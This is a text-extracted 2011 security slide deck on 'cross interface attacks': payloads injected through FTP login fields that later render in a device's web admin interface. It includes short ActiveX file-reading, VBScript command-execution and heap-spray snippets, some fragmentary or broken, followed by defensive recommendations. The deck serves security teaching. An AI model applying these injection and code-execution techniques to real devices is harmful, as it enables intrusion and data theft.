Cross Interface Attacks

CROSS INTERFACE ATTACK
Piyush Mittal
Security Compass

Introduction
When 1 interface is used to attack the other interface.

Different from XSS
XSS - Entry point is from web to web
CIA - Entry point is from backend login console to web interface

CIA Characteristics
Exploits the default nature of FTP /Telnet Protocol
Admin interfaces : { Web, FTP, Telnet}
Logging module running as root
DOM and HTML rendered as dynamic content
Attacks are persistent in nature
Hardware devices – firewalls, disk stations, management systems etc.

Truth About FTP
The default design of FTP allows the acceptance of both username and password prior to the authentication process and complete veriﬁcation.
No check on no of login attempts.
No check on type of characters.

Old Buffer Trick
root@redux$ ftp example.com
Connected to example.com.
220 Disk Station FTP server at DiskStation ready.
User (example.com:(none)):
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAA
331 Password required for
AAAAAAAAAAAAAAAAAAAAAAAAAA.
Password:
530 Login incorrect.
Login failed.

Design of the Application
FTP
LOGIN
INTERFACE
I

FTP
LOGIN
INTERFACE
Inject
Payload
I

FTP
Authentication
Module
FTP
LOGIN
INTERFACE
Inject
Payload
I

FTP
Authentication
Module
FTP
LOGIN
INTERFACE
FTP Logging Module
Inject
Payload
I

FTP
Authentication
Module
FTP Logging module run as root or administrator
FTP
LOGIN
INTERFACE
FTP Logging Module
Inject
Payload
I

FTP
Authentication
Module
FTP
LOGIN
INTERFACE
FTP Logging Module
Inject
Payload
Web Interface
I

FTP
Authentication
Module
FTP
LOGIN
INTERFACE
FTP Logging Module
Unencoded/Unfiltered
HTML rendering
Inject
Payload
Web Interface
I

THREATS
Information Stealing
Sample code

THREATS
Cookie Stealing

THREATS
Malware Infections - Executing payloads to conduct Drive by Download Attacks
Sample code

THREATS
Drive by Download Attack

THREATS
CSRF
Sample code
Tuning Network device into attack pot

Advanced Code Injections
Active X code execution
varfso = new ActiveXObject(”Scripting.FileSystemObject”);
XFile = fso.GetFile(”c:/business/secret.txt”);
stream = XFile.OpenAsTextStream(1, 0);
var content = stream.ReadAll();

VBScript code execution
<object classid=’clsid:72C24DD5-D70A-438B-8A42-
98424B88AFB8’ id=’target’ >
</object> <script language=’vbscript’>
arg1=”c:/WINDOWS/system32/calc.exe”
target.Exec arg1
</script>

Heap Spray code execution
varshellcode = unescape(””);
var heap block=unescape(”%u0a0a%u0a0a”);
varnop sled= unescape(”%u09090%u09090%u09090”)
do {
heap_block += heap_block;
} while (heap_block.length < xxxx)
var memory = new Array();
for (ret=0; ret <100; ret++)
{ memory[ret] += heap_block+nop_sled+shellcode; }

AJAX code execution

DEFENSE
A whitelist approach should be followed at the protocol level to reduce the impact of exploitation.
The error reporting mechanism should be used in conjunction with the FTP authentication module to restrict the acceptance of malicious input through login consoles.
The logging process should not run as administrator or root user.
The logs should be rendered in a customized format which does not allow DOM and HTML elements to get rendered as dynamic content.
The content should be sniffed to avoid the usage of malicious input thereby defining the Content-Type appropriately.

???????
When In doubt, its better to ask

References
http://www.google.co.in/search?q=http%3A%2F%2Fmilw0rm.com%2Fexploits%2F6476&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a#sclient=psy-ab&hl=en&client=firefox-a&rls=org.mozilla:en-US%3Aofficial&source=hp&q=cross+interface+attack&pbx=1&oq=cross+interface+attack&aq=f&aqi=&aql=&gs_sm=e&gs_upl=37279l38938l11l40023l2l2l0l0l0l0l268l492l2-2l2l0&bav=on.2,or.r_gc.r_pw.&fp=a0ba24de15e40bac&biw=1366&bih=558
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-2453
http://www.securityfocus.com/archive/1/archive/1/513970/100/0/threaded

THANKS

Cross Interface Attacks

by n|u - The Open Security Community on Sep 21, 2011

Accessibility

Categories

Tags

Upload Details

Usage Rights

1 Embed 353

Statistics

Cross Interface Attacks — Presentation Transcript